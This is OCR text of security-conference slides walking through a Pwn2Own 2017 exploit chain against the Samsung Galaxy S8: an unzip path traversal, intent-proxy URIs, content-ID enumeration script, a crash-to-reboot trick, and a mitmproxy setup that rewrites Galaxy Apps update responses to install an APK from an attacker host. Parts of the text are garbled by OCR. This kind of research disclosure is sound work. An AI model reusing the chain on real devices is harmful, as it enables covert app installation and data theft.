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Agenda 

• Mobile Pwn20wn 2017 


• Samsung Galaxy S8 

• Android Nougat (7.0) 

• Bug hunting automation 

• Tooling 

• Static approach 

• Dynamic approach 
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Target of choice 


Samsung UK O 

@SamsungUK 

Your phone is more than just a phone. Break boundaries 
and discover the #GalaxyS8 and #Note8 today. 

237 PM-NOV 15, 2017 

G. Geshev 

@munmap 

Your phone is more than just a phone. It's an 
incredibly well developed @OWASP Mobile 
Top 10 training platform. #GalaxyS8 #Note8 
#MP20 #Pwn20wn 

Samsung UK • @SamsungUK 

Your phone is more than just a phone. Break boundaries and 
discover the ^GalaxySS and #Note8 today. 


8:26 AM - 17 Nov 2017 


'tM wok « (has m*’ 

0:25 
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Traditional Approach 


• Search for commonly misused methods 

• Class loading 

• Unzip path traversals 

• External storage operations 

• SSL error handling 

• Decompile APK 

• Is it used? Is it accessible? Is it vulnerable? 

• Repeat for each application on the device 
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Traditional Approach 


• Too much noise! 


$ grep --include=*.smali 


4610 



-r getClassLoader 


-1 

wc -1 
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Process Automation 


• Which parts of the process can we automate? 

• Is it used? 

• Is it accessible? 

• Is it vulnerable? 









Process Automation 


• Wouldn't Joern solve this? 

• Code property graphs 

• C/C++ only 

• We need Joern for Android 

• Jandroid 
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Automation Overview 


1. Find use of search term in the application 

2. Find calls to this method 

3. Find calls to these methods 

4. Find any instances of methods exported in Manifest 
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Automation Overview 


1. Find use of search term in the application 

2. Find calls to this method 

3. Find calls to these methods 

4. Find any instances of methods exported in Manifest 
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Automation Overview 


1. Find use of search term in the application. 

2. Find callers of the interesting method. 

3. Recursively find callers of those callers. 

4. Any the of the methods exported in the Manifest? 
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Static Analysis 


• Data stored in Neo4j 


Manifest Method 

Entry Name 


:Manifest - :CALLS -> :Method - :USES* 


at Scale 








Jandroid Example 
Directory Traver 


sal during unzip 
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Jandroid Example: 

Directory Traversal during unzip 


• Normally caused by f java. util. zip' 

• However Samsung also use f net. lingala. zip4j‘ > 

• Use Jandroid to look for f extractAll J 
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Jandroid Exampl 
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S 3S0 


nple: 

aversal 


during unzip 
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Unzip Directory Traversal in 
Samsung Notes 
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Notes Directory Traversal 


• Memo files unzipped using Zip4j 

• Lack of path names canonicalisation 


public static String convertToSDocFile Context context String path 

String v2 j 

String tmpDirStr context getCacheDir M /unzip_" 

System currentTimeMillis 

File tmpDir new File tmpDirStr 
tmpDir mkdir 

try i 

new ZipFile path extractAll tmpDirStr // Extracts ZIP entries. 

v2 NMemoConverter parseMemoXML context tmpDirStr 
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Jandroid Release? 





i 
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Building an Exploit Chain 

• Finished! 

• Not quite... 


Browse to 
Website on 
Device 


??? 


(Over)Write 

File 


??? 


Code Exec 
and Profit 
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Samsung Notes 


• Conversion activity 

• Unreachable from the browser 

android:configChanges="mcc |mnc|orientation|screenSize" 

android:name=" com.Samsung.android.app.notes.composer.ConvertToSdocActivity" 

android:screenOrientation="portrait" 

android :theme="(a)sty le/AppTheme. NoActionBarTran spa rent" 

android:name=" android.intent.action.VIEW" 

android:name=" android.intent.category.DEFAULT" 
android: mimeType="application/spd" 
android: mimeType="application/memo" 
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intent Proxy Bug 


• Android Vending 

• LaunchUrlHandlerActivity 

• We control the package name and URI 

final Intent a Intent angl7 b argl8 j argl9 

Intent v2_l 

Uni v7 angl7 getData 

String v8 v7 getQuenyParameten "url" 

String vl0 v7 getQueryParameter "id" 

if v5 vl2 

v2_l new Intent 'android.intent.action.VIEW" 
v2_l setData Uri parse v8 
v2_l setPackage vl0 
return v2 1 
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Launching Samsung 

Chrome Android Vending 


market: //details?url... 


Notes 




intent Proxy Bug 


market://details ?url=http ://www.attacker.com/ 
whatever. memo&id=com .Samsung.android.app.notes 

• Won't work, only local schemes are processed! 


market: //details?url=file :///sdcard/Download/ 
whatever .memo&id=com. Samsung.android.app.notes 


• Won't resolve due to a MIME mismatch! 

• f FilellriExposedException' on Android 7.0+ 
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Chrome Content Provider 


android:authorities=" com.android.chrome.FileProvider" 

android:exported="f alse" 

android rgrantllr iPermiss ions=" true" 

android:name="org. chromium.chrome.browser.util.ChromeFileProvider" 
android: name="android.support.FILE_PROVIDER_PATHS" 
android:resource="@xml/f ile_paths" 


Android Manifest.xml 


i-1 

j xmlns:android="http: //schemas.android.com/apk/res/android" j 

name="downloads" path="Download/" i 

i _ i 

file_paths.xml 
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File vs. Content Providers 


jmarket: //details?url=content :// 

| com.android.chrome.FileProvider/downloads/ 
^whatever v memo&id=com . Samsung,, android. ap,p. notes 

* Worvt resolve clue ta a mismatch! 


market: //details?url=content ://media/external/file/ 
3B0&id=com. Samsung.android.app.notes 


• Works! 
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File vs. Content Providers 


jmarket: //details?url=content :// 

| com.android.chrome.FileProvider/downloads/ 

^whatever,, memq&id=com . Samsung., android. app. notes 
l ^ won t fesolve due to aTviflvIt fnisroatclF! ~~ 


<bullet point(s) about file provider-’s lack of 
knowledge about MIME types; when using File 
Providers, MIMEs are resolved against a list of well- 
known mappings. Memo isn J t in this list, so 
f application/octet' stream is returned> 
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Download File 


• Download Memo file 

• Content-Type: application/memo 

•Chrome's file provider 

• Doesn't keep track of MIME types 

• <example> 

• Any content provider mapped over /sdcard/Download 

• E.g. Media Provider 

• Unknown content ID 

• <example> 
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Determine ID of a content provider 


i- 

| scriptElement.src "content://media/external/file/999999”; 

i_ 

Triggers onErrorQ 


i--- 

| scriptElement.src "content://media/external/file/9”; 

i_ 

Triggers onLoadQ 


MWR _ ^ M 

l^BS 











Determine 

Content ID 


r 

scriptElement . src 

|_ _ 

"content://media/external/file/999999"; 


• onerror(); 



r 

scriptElement.src 

|_ _ 

"content://media/external/file/9"; 


• onload(); 
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Content Scheme SOP 


• Content Resource Enumeration 

• Android MediaProvider 


jvar i 300; 

jvar scriptElement document. createElementC'script"); 

| scriptElement.onerror functionQ { i ; next(); }; 
jscriptElement.onload function() { foundltQ; }; 
i sscriptElement . snc "content://media/extennal/file/" i; 
jdocument. boby . appendChild (scriptElement); 
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Content Scheme SOP 


• Content Resource Enumeration 

• Android MediaProvider 


jvar i 300; 

jvar scriptElement document. createElementC'script"); 

| scriptElement.onerror functionQ { i ; next(); }; 
jscriptElement.onload function() { foundltQ; }; 
i sscriptElement . snc "content://media/extennal/file/" i; 

jdocument. boby . appendChild (scriptElement); 

• Download Memo file 

• Content-Type: application/memo 

• Preserve Memo file ID in Web Storage 


300 

103 

102 

101 

100 

99 

98 


whatever.memo 
payload.html 
something.mp3 
foobar.txt 
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Content Scheme 


• Enumeration only possible from f content J scheme 

• Intra- or inter-provider requests 

• Content Provider scheme 

• Disabled in SBrowser 

• Handled by Chrome 

• Redirect to Chrome? 
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Redirect to Chrome 


• Redirect to Chrome 

• googlechrome://navigate?url=<destination> 

android:exported="true" 

android:name=" com.google.android.apps.chrome.Main" 

android:targetActivity="org. chromium.chrome.browser.document.ChromeLauncherActivity" 

android: name="android.intent.action.VIEW" 

android:name=" android.intent.category.DEFAULT" 
android: name="android.intent.category.BROWSABLE" 
android: scheme="googlechrome" 


• Previously reported... 
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Redirect to Chrome 


Reported by Takeshi Terada in April 2017 

• Magically fixed 


Comment 24 by qin. @chromium ora . Apr 27 2017 

for #23, i saw the same behavior on f-‘57. 

But when building from trunk, i saw both method won’t work due to "Navigation is blocked" 
So someone patched the fix recently to all transition types. 

Comment 25 by sgu. @chromium org . Apr 27 2017 

Nice, the bug was fixed then? 

Comment 26 by gin . @chromium.ora . Apr 28 20 1 7 
Status: Fixed 

I think so, mark this as fixed, please reopen if this is still reproducible on dev. 

Comment 27 by meacer@chromium orq . Apr 28 2017 

It would be nice to find out which bug fixed this before closing. Can we bisect? 


https://bugs. chromium. org/p/chromium/issues/detail?id=714442 
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Redirect to Chrome 


• Chrome Content Provider 

• com.android.chrome.FileProvider 


android:authorities=" com.android.chrome.FileProvider" 

android:exported="false" 

android: grantUriPermissions= ,, true" 

android:name="org. chromium.chrome.browser.util.ChromeFileProvider" 
android: name="android.support.FILE_PROVIDER_PATHS" 
i android: resource="@xml/file_paths" 

i_ 

i- 

igooglechrome://navigate ?url=content :// 

icom.android.chrome.FileProvider/downloads/downloadme.html 
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Redirect to Chrome 


googlechrome: //navigate?url=content :// 

com.android.chrome.FileProvider/downloads/payload.html 

• Works! 
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Landing Page 


• Automatic file download in Samsung Browser (SBrowser) 

• Content-Type: application/force-download 


location 


*\J 


A 


/payload.*\.html$ { 


application/force-download; 


> 


i_i 


nginx.conf 


• File saved to f /sdcard/Download J 


MWR _ ^ M 

lABS 




Recap 

Attacker's 
Web Server 


Samsung Browser 


GET /index.html 
◄- 

index.html 

-► 

GET /payload.html 

payload.html 
(Download) 

--► 


googlechnome:// 
navigate? 
url=cori Lent: //... 


Chrome 


► 
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Exploit Phase #1 




.< 


%»V e 


<y 


s? 


& 


X<* 

e 0, v „t 


index.html 
◄- 

index.html 
- * 

jpayload. h tml 
payload.html 


googlechrome: 

//navigate?... 


whatever.memo 


whatever.memo 


^> e 

ot° 


content: //media/... 



s\e^ 


market: //details?url... 




Intent 
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Building an Exploit Chain 


• Finished! 

• Not quite... 
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Arbitrary File write 


• Limited locations 

• Samsung Notes sandbox 

• SD card 

• Finding applications reading files 

• Naive static approach 

• grep 

• Naive dynamic approach 

• inotify 

• Hooking 
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Dynamic Analysis 


• Attack surface analysis 

• Parse Manifests 

• ADB and Python 

• Activities 

• Enabled? 

• Exported? BROWSABLE? 

• Intent extras 

• URI parameters 
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Dynamic Analysis Toolset 

• Xposed 

• Early injection (Zygote) 

• Global hooks across multiple applications 

• Frida 

• Quick and easy prototyping 

• Debugging and dynamic analysis of obfuscated code 


Xposed 

Global Hook 

Flexible 

Requires Root 

Lightweight 

Frida 
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Arbitrary File write (cont.) 


public void handleLoadPackage final LoadPackagePanam IpPanam throws Throwable 


findAndHookMethod "java.io.File" IpParam cla 
(^Override protected void beforeHookedMethod 
File f File param thisObject 
String fPath f getCanonicalPath 


ssLoader "exists" new XC_MethodHook 
MethodHookParam param throws Throwable 


if 


fPath startsWith "/storage" 
fPath startsWith "/sdcard" 
fPath startsWith "/mnt" 

fPath startsWith "/data/data/com.Samsung.android.app.notes" 


XposedBridge log "File: " IpParam packageName 


ii 


ii 


fPath 


MWR _ ^ M 

l/'BS 







Leftover Debug code 


• Galaxy Apps 

• Leftover code for staging environments 

• Configuration file loaded from disk 

• Configuration file settings 

• Take precedence 

• Control the Galaxy Apps behaviour 
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Leftover Debug code 


public class ConcreteSaconfiglnfoLoader implements SAppsConfig 
private String mlsStaging 
private String mStagingDataHostllrl 
private String mllpdatelnterval 

public ConcreteSaconfiglnfoLoader 


String fname Common coverLang "78.,66,68,74,73,6b,6e,6c,33,6e.,73.,6e, " 
try 

sdpath Environment getExternalStorageDirectory getCanonicalPath 


File v4 new File sdpath fname i 

i if v4 exists return i 

i_j 
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Leftover Debug Code 

^INOT SURE 11 OBFUSCATED 


public class 
private SI 
private SI 
private SI 

// 

public Cor 

// 

// f sa 

String 



*3,6e,73,6e/' 


^anonicalPath 
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Leftover Debug code 


• Three key settings 

• Staging mode flag 

• Staging server 

• Update interval 

• Configuration file format 

ixi=i ; 

jX4=http://10.42.0.30:8181/ods.as ; 
1X46=5000 ; 

i_ 

saconfig.ini 


mlsStaging 

mStagingDataHostUrl 

mUpdatelnterval 
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Galaxy Apps Reconfiguration 


• Applying the new configuration 

• Restart application 

• Reboot device 

• Rebooting Android 

• Crash a system critical process 
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Rebooting Android 


• Crashing a system critical process... 

• com.android.server.telecom 

• Activity expecting a non-empty URI 

• com.android.server.telecom.components.UserCallActivity 
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Rebooting Android 


• Crashing a system critical process... 

• com.android.server.telecom 



• Activity expecting a non-empty URI 

• com.android.server.telecom.components.UserCallActivity 
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Rebooting Android 


; private void processOutgoingCalllntent Intent paramlntent String paramString boolean paramBoolean 
i if paramlntent null return 
i Uri uri paramlntent getData 

| String uriScheme uri getScheme 

; String uriSchemeSpecificPart uri getSchemeSpecificPart 

i if "voicemail" equals uriScheme 

i if PhoneNumberUtils isUriNumber uriSchemeSpecificPart 

i_ 

I*** FATAL EXCEPTION IN SYSTEM PROCESS: main 
6 • • • 

icaused by: java.lang.NullPointerException: 

| Attempt to invoke virtual method 'java.lang.String android.net.Uri.getScheme()' on a null object reference. 
| at com. android. server .telecom, components .UserCalllntent Processor. processOutgoingCallIntent(...) 

; at com. android. server .telecom, components .UserCalllntent Processor. processIntent(...) 

; at com.android.server.telecom.components.UserCallActivity.onCreate(UserCallActivity.java:67) 

i at android.app.Activity.performCreate(Activity.java:6955) 

| at android.app.Instrumentation.callActivityOnCreate(Instrumentation.java:1126) 

! at android.app.ActivityThread.performLaunchActivity(ActivityThread.java:2927) 
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Rebooting Android 


• Unreachable from the browser 

• The Intent proxy bug won't work either 

• We can only specify package name and URI:-( 

android:conf igChanges="keyboardHidden|orientation|screenSize" 

android: excludeFromRecents= ,, true" 

android:name=" .components.UserCallActivity" 

android:permission="android .permission.CALL_PHONE" 

android :t heme="(a)style/Theme.SecTelecomm. Transparent" 

android:name=" android.intent.action.CALL" 

android: name="android.intent.category.DEFAULT" 
android:scheme="tel" 
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intent Proxy Bug #2 


• Samsung Members 

• LauncherActivity 

i- 

I ; <activity android:name="com. Samsung.android.voc.LauncherActivity" 

■ android :theme="@android:style/Theme.Translucent.NoTitleBar" 

android:name=" android.intent.action.VIEW" 

android:name=" android.intent.category.DEFAULT" 
android: name="android.intent.category.BROWSABLE" 
android:scheme="voc" 
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intent Proxy Bug #2 


public static void performActionLinkContext Context activity String 
actionLink Bundle bundle 


pName uri getQueryParameter "packageName" 

String cName uri getQueryParameter "className" 
if pName null 
if cName null 

ComponentName comp new ComponentName pName cName 
newlntent new Intent "android.intent.action.MAIN” 
newlntent addCategory "android.intent.category.LAUNCHER" 
newlntent setComponent comp 


activity startActivity newlntent 
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intent Proxy Bugs Summary 


Android Vending 
(Bug #1) 

Samsung Members 
(Bug #2) 


Attacker-Controlled Data 


Package Name 

Activity Name 

URI 

Extras 










Action 
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Abusing Samsung Members 


• Package name 

• com.android.server.telecom 

• Class name 

• com.android.server.telecom.components.UserCallActivity 


voc://activity/general ?packageName=com. android.server.telecom 
&classl\lame=com. android. server .telecom, components .UserCallActivity 
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Launching Samsung Notes 

Chrome Samsung Members Android Telecom 

voc://activity/ 
general? 

- -► 

packageName... 


LauncherActivity 


Intent 

-► 
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JavaScript Clicks 


• Two automated actions with JavaScript 

• Dot-click to drop the file in SD card 

• Dot-click to crash Android 

• Second click results in 'Navigation Blocked' 

• Smuggling a second click? 

• Telecom crash 

• Freezes 

• Resumes 

• Reboots 
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JavaScript Clicks 


• Chrome developers' reaction... 

i- 

\l've not been able to reproduce, or otherwise work out if they 
[are losing a security race or winning a f unctionality race. 

https://bugs. chromium. org/p/chromium/issues/detail?id=781143 

• This should've worked without the race?! 
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100 milliseconds 


Triggering Bugs from Browser 


Chrome 


Android Vending 


Android Telecom 


market://details? 

url=... 


Intent 


Samsung Members 


Samsung Notes 


voc://activity/general? 

packageName=... 


Intent 
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100 milliseconds 


Triggering Bugs from Browser 


Chrome 


Android Vending 


Android Telecom 


market://details? 

url=... 


Intent 


Samsung Members 


Samsung Notes 


voc://activity/general? 

packageName=... 


Intent 
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Scheduling an update 


• Phone reboots 

• Galaxy Apps starts on boot 

• Parses configuration file Vsdcard/saconf ig. ini J 

• Schedules automatic update checks 

• Periodic job 

• Android Job Scheduler 

• Introduced in Android 5.0 (API level 21) 
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Android Job Scheduler 


• Job Scheduler limitations 

• Changes in Android Nougat 

• Periodic jobs are clamped to 15 min. 

• Pwn20wn attempts are time-limited 

i- 

|A contestant has up to three (3) attempts to succeed. Each of 
| the 3 attempts will be individually limited to a time period of 
five (5) minutes. 

• Integer overflow in Android Scheduler 

• No security implications per se... 
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Periodic Job Cl 




public class loblnfo implements Parcelable 
public static final class Builder 
public loblnfo build 

loblnfo job new loblnfo this 

if job isPeriodic 

if job intervalMillis job getlntervalMillis 
StringBuilder builder new StringBuilder 
builder append "Specified interval for " 

append String valueOf mlobld 
append " is " 

formatDuration mlntervalMillis builder 
builder append Clamped to " 
formatDuration job getlntervalMillis builder 
Log w TAG builder toString 
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Clamping Bypass 


public static DobStatus createFromDoblnfo Doblnfo job int callingUid String 
sourcePackageName int sourcellserld String tag 

final long elapsedNow SystemClock elapsedRealtime 

final long earliestRunTimeElapsedMillis latestRunTimeElapsedMillis 

if job isPeriodic 

latestRunTimeElapsedMillis elapsedNow job getlntervalMillis 
earliestRunTimeElapsedMillis latestRunTimeElapsedMillis job getFlexMillis 


return new DobStatus job callingUid sourcePackageName sourceUserld tag 0 
earliestRunTimeElapsedMillis latestRunTimeElapsedMillis 
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Downloading and installing APK 


• Reverse proxy with 'mitmproxy' 

i- 

i mitmdump -p 8181 -R https://uk-odc.samsungapps.com/ -s relay.py 

• Relaying content between Galaxy Apps and Samsung servers 

• Modifying requests and responses as needed 

^1 HTTP 

V_ 

Victim 


HTTPS 




n 


> 





< 


MITM Proxy 


Samsung Servers 
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Downloading and installing APK 


• <diagram> 

• <snippet from rewriting the requests/responses> 

• <Delivering a modified Drozer build.> 
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Downloading and installing APK 


Galaxy Apps 


Attacker 


Samsung Server 


getUpdateList 

(Request) 

getUpdateList 

(Modified Response) 

productDetailMain 

(Request) 

productDetailMain 

(Modified Response) 

downloadForRestore 

(Request) 

downloadForRestore 

(Modified Response) 


getUpdateList 

(Request) 

getUpdateList 

(Response) 

productDetailMain 

(Request) 

productDetailMain 

(Response) 

downloadForRestore 

(Modified Request) 

downloadForRestore 

(Modified Response) 
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Downloading and installing APK 

Galaxy Apps Attacker Samsung Server 

getUpdateList 

(Request) 
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Downloading and installing APK 


Galaxy Apps 


Attacker 


Samsung Server 


_ 1 _ 

<?xml vension="1.0" encoding="UTF-8"?> 

<SamsungProtoco] networkType="0" version2="3" lang="EN" openApiVersion="24" deviceModel="SM- 
G950F" mcc="234" mnc="10" csc="BTU" odcVension= ,, 4.2.10-ll" vension="5 .5" filter="l" 

<requekl name="getUpdateList" id="2389" numParam="9“ transactionld="257eebcda004" 

<pa name="loadApp">com. sec.spp. pus h(a)l. 9.01(5)190100000(6)0| 

com.android.chrome@60.0.3112.107@311210752@0| 

<param name="userID"></param> 

< pa ram name="imgHeight"x/param> 

<param name="stduk"></param> 

<param name="imglAlidth"></param> 

<param name="imei"></param> 

< pa ram name=" justForCount"x/param> 

< pa ram name="autoUpdateYN"x/param> 

< pa ram name=" predeployed "x/param> 
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Downloading and installing APK 

Galaxy Apps Attacker Samsung Server 


getUpdateList 

(Request) 

-► 


getUpdateList 

(Request) 

-► 
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Galaxy Apps 


Attack 


getUpdateList 

(Request) 


installing APK 

Samsung Server 
getUpdateList 

(Request) 

-► 

getUpdateList 

(Response) 
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Downloading and installing APK 


Galaxy Apps 


I 


■PJ 1 WLjrl 


■k 


Attacker 


l 


+-.LJj 
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tm 
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Samsung Server 


I 


<?xml version="1.0" encoding="UTF-8"?> 

<SamsungProtoco] version="5 .5" lang="EN" networkType="0" deviceModel="SM-G950F"> 

<response id="2389" name="getUpdateList" returnCode="0" totalCount="l" endOfList="l" 
transactionld="257eebcda004"> 


errorCode="0" 


st numValue="18"> 

<val name="GUID" >com.sec.spp. push</value> 

<value name=" productID" >000000202169</value> 
<val name="productName">Samsung Push Service 
<value name=" version" >1.9.01</value> 

<value name="versionCode">190100000</value> 

<!-- ... --> 
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Downloading and installing APK 

Galaxy Apps Attacker Samsung Server 
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<?xml version="1.0" encoding="UTF-8"?> 

<SamsungProtoco] version="5.5" lang="EN" networkType="0" deviceModel="SM-G950F"> 

<response id="2389" name="getUpdateList" returnCode="0" totalCount="l" endOfList="l" 
transactionld="257eebcda004"> 


errorCode="0" 


st numValue="18"> 

<val name="GUID" >com.sec.spp. push</value> 

<value name=" productID" >000000202169</value> 
<val name="productName">Samsung Push Service 

name="version">1.9.02 ie> 

<val name="versionCode" >190200000</value> 

<!-- ... --> 
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i<?xml version="1.0" encoding="UTF-8"?> 

i <SamsungProtoco] netwonkType="0" version2="3" 

|G950F" mcc="234" mnc="10" csc="BTU" odcVersio 
i <reques' name="productDetailMain" id="2280 
| <param name="orderID" '> 

\ <parat name="stduk">XXX</param> 

i <param name="source" /> 

\ <parat name="versionCode">190100000</pa 

i <parar name="imei">XXX</param> 

i <parar name="unifiedPaymentYN">Y</param 

| <pa name="productImglAlidth" 135</para 

i <parat name="productID">000000202169</p 

i <pa name="productImgHeight">135</par 
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lang="EN" openApiVersion="24" deviceModel="SM 
n="4. 2.10-11" vension="5 .5" filter= ,, l"> 

" numParam="9" transactionld="257eebcda006"> 
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<?xml version="1.0" encoding="UTF-8 ,, ?> ® ^ 

<SamsungProtoco] version="5.5" lang="EN" networkType="0" deviceModel="SM-G950F"> 
<response id="2280" name="productDetailMain" returnCode="0" startNum="l" endNum 
totalCount="l" transactionld="257eebcda006" > 

<errorInfo> 


ii ii 


<errorString errorCode="0" 

</errorIn¥oyUUC^ue^dl±l 

<l.isl numValue="81"> 


<value name=" productID" >000000202169</value> 
kva] name="productName">Samsung Push Service 
<va] name="GUID" >com.sec.spp. push</value> 

< ! -- ... --> 

</list> 

</response> 

</SamsungProtocol> 
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<?xml version="1.0" encoding="UTF-8 ,, ?> ® ^ 

<SamsungProtoco] version="5.5" lang="EN" networkType="0" deviceModel="SM-G950F"> 
<response id="2280" name="productDetailMain" returnCode="0" startNum="l" endNum 
totalCount="l" transactionld="257eebcda006" > 

<errorInfo> 


ii ii 


<errorString errorCode="0" 

</errorIn¥oyUUC^ue^dl±l 

<l.isl numValue="81"> 


<value name=" product ID" >000000202169</value> 
kva] name="productName">Samsung Push Service 
<vaj name="GUID">com.mwr.dz / value> 

<!-- ... --> 

</list> 

</response> 

</SamsungProtocol> 
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<?xml version="1.0" encoding="UTF-8"?> 

_■■■■■■■■■■■■ -A.nAr. _ 1 

* — — -1 

<SamsungProtocol networkType="0" version2="3" 

lang="EN" openApiVersion="24" deviceModel="SM- 

G950F" mcc="234" mnc="10" csc="BTU" odcVersion= ,, 4.2.10-ll" version="5 .5" filter=" 

1"> 

<request name="downloadForRestore" id="2316" numParam="6" transactionld="257eebcda007"> 

<pa 

rat name="predeployed" 0</param> 



<pa 

ra name="stduk">XXX</param> 



<pa 

rat name="imei" XXX )aram> 



fU 

CL 

V 

ram name="autoUpdateYN">Y</param> 



<pa 

name="downloadType">new</param> 



<pa 

rat name="GUID" com.mwr.dz 'am> 



</request> (Modified Response) 



</Samsung 

Protocol> 
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<?xml version="1.0" encoding="UTF-8"?> 

_■■■■■■■■■■■■ -A.nAr. _1 

* — —-1 

<SamsungProtocol networkType="0" version2="3" 

lang="EN" openApiVersion="24" deviceModel="SM- 

G950F" mcc="234" mnc="10" csc="BTU" odcVersion= ,, 4.2.10-ll" version="5 .5" filter=" 

1"> 

<request name="downloadForRestore" id="2316" numParam="6" transactionld="257eebcda007"> 

<pa 

rat name="predeployed" 0</param> 



<pa 

ra name="stduk">XXX</param> 



<pa 

rat name="imei" XXX )aram> 



fU 

CL 

V 

ram name="autoUpdateYN">Y</param> 



<pa 

name="downloadType">new</param> 



<pa 

name="GUID" com.sec.spp . push</pa 

ram> prOuUC"CUG"Cdl±l lain 


</request> (Modified Response) 



</Samsung 

Protocol> 
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<?xml verjsion="1.0" encoding="UTF-8"?> 

<SamsungProtoco] version="5.5" lang="EN" networkType="0" deviceModel="SM-G950F" > 

<response id="2316" name="downloadForRestore" returnCode="0" transactionld="257eebcda007"> 

<enrorlnfo>o r & r 

<errorString errorCode="0"> </errorString> __ 

</errorInfo> , . _ . , ._ . 

clist numValue="12"> 

name="downLoadURI" > http://samsappsbn.vo.llnwd.net/... </value> 

<value name="contentsSize">1588893</value> 

<val name="productID" 000000202169</value> 

<val name="productName" Samsung Push Service</value> 

<value name="installSize">1588893</value> 

<val name="signature" 73-114-39108-688063-79... 

<!-- ... --> 

</list> 

</response> QOWniOGCIrOPKGS’tOPG 

</SamsungProtocol> Response) 
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<?xml verjsion="1.0" encoding="UTF-8"?> 

<SamsungProtoco] version="5.5" lang="EN" networkType="0" deviceModel="SM-G950F"> 

<response id="2316" name="downloadForRestore" returnCode="0" transactionld="257eebcda007"> 

<enrorlnfo>o r & r 

<errorString errorCode="0"> </errorString> __ 

</errorInfo> , . _ . , ._ . 

clist numValue="12"> 

name="downLoadURI" http://10. 42.0. 30:8000/drozer.apk 
<value name="contentsSize">23890056</value> 

name="productID" 000000202169 
name="productName" Samsung Push Service 
<value name="installSize">23890056</value> 

<val name="signature" 11-33-35-8-53-93-43-... 

<!-- ... --> 

</list> 

</response> QOWniOGCIrOPKGS’tOPG 

</SamsungProtocol> Response) 
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Permission Request Prompts 


• Runtime permission requests introduced in Marshmallow 

• Android 6.0+ (API 23+) and... 

• The application's f targetSdkVersion‘ > is set to 23+ 

• Dangerous permissions are only granted at runtime 


Allow Hangouts to 
send and view SMS 
messages? 
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Permission Prompt Bypass 


• Building the APK to bypass permission prompts 

• Set f targetSdkVersion J to 18 (Jelly Bean) 

i- 

As Android evolves with each new version, some behaviors and even 
\ appearances might change. However, if the API level of the platform 
i/s higher than the version declared by your app's targetSdkVersion, 

\ the system may enable compatibility behaviors to ensure that your 
\app continues to work the way you expect. 

https://developer.android.com/guide/topics/manifest/uses-sdk-element.htmlMtarget 
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Permission Prompt Bypass 


• Building the APK to bypass permission prompts 

• Set f targetSdkVersion J to 18 (Jelly Bean) 

i-1 

As Android evolves with each new version, some behaviors and even \ 

| appearances might change. However, if the API level of the platform \ 
i/s higher than the version declared by your app's targetSdkVersion, 

\ the system may enable compatibility behaviors to ensure that your \ 

\app continues to work the way you expect. 

https://developer. android.com/guide/topics/manifest/uses-sdk-element.htmltttorget 

• Changes in Android P 
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Are we done yet? 

• We assumed APK install would be enough 

• Chatted to ZDI to clarify a few things 

• Code execution 

• Exfiltrated sensitive data 

• Contacts 

• Messages, etc. 

• Dormant APK won't cut it... 
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Launching Application 


• Applications are placed in 'stopped' mode upon installation 

• Android 3.1+ (API 12+) 

• Prevents self-launching 

• (Modified) Android Contacts Provider 

• Code heavily modified by Samsung 

• com.android.providers.contacts 
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(Modified) Android Contacts Provider 


android:name="PackageIntentReceiver" ; 

android:name="android.intent.action.PACKAGE_ADDED" 
android:scheme="package" j 

android:name="android.intent.action.PACKAGE_REPLACED" 
android:scheme="package" I 

android:name="android.intent.action.PACKAGE_REMOVED" 
android:scheme="package" | 

android:name="android.intent.action.PACKAGE_CHANGED" i 

android: scheme= ,, package" i 
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Launching Application 


public void onReceive Context context Intent intent 
Uri v2 intent getData 
if v2 null 

String vl v2 getSchemeSpecificPart 

ContentProvider v3 ContentProvider coerceToLocalContentProvider 

context getContentResolver acquireProvider 

"com.android.contacts" 


if v3 instanceof ContactsProvider2 

EventLogUtil secVF PackagelntentReceiver TAG vl " is changed." 
ContactsProvider2 v3 onPackageChanged vl 

this handlePackageChangedForVoicemail context intent 
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Launching Application 


; public void onPackageChanged String packageName 
Packagelnfo pm 

| try pm this mPackageManager getPackagelnfo packageName 136 
i this updateDirectoriesForPackage pm false 

i__ 

i-- 

; private List updateDirectoriesForPackage Packagelnfo plnfo boolean argl5 
j int i 0 

ArrayList empty Lists newArrayList 
Providerlnfo providers plnfo providers 
if providers null 

int numOfProviders providers length 
for Providerlnfo providerlnfo: providers 

if ContactDirectoryManager isDirectoryProvider providerlnfo 

this queryDirectoriesForAuthority empty providerlnfo 
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Content Provider implementation 


android: name="com.mwr.dz.MyContentProvider" 
android: authorities= M dzprovider" 
android: enabled="true" 
android: exported="true" 

android:name=" android.content.ContactDirectory" 
android :value="true" 


public Cursor query Uri uri String projection String selection 

String selectionArgs String sortOrder 
Intent i new Intent 

i addCategory "com.mwr.dz.START_EMBEDDED" 

i setComponent new ComponentName "com.mwr.dz" "com.mwr.dz.services.ServerService" 
Context c getContext 

c startService i 
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munmap@debian: -/Exploit/demo 


File Edit View Search Terminal Tabs Help 


munmap@debian:~/Exploit/demo$ mitmdump -p 8181 -R https://uk-odc.samsungapp 











Conclusions 

• Even basic automation can save time 

• OEM bloatware is still a major problem 

• Seemingly boring bugs can come in handy 

• The variety of IPC options on Android presents numerous 
opportunities for omnifarious bugs to occur 
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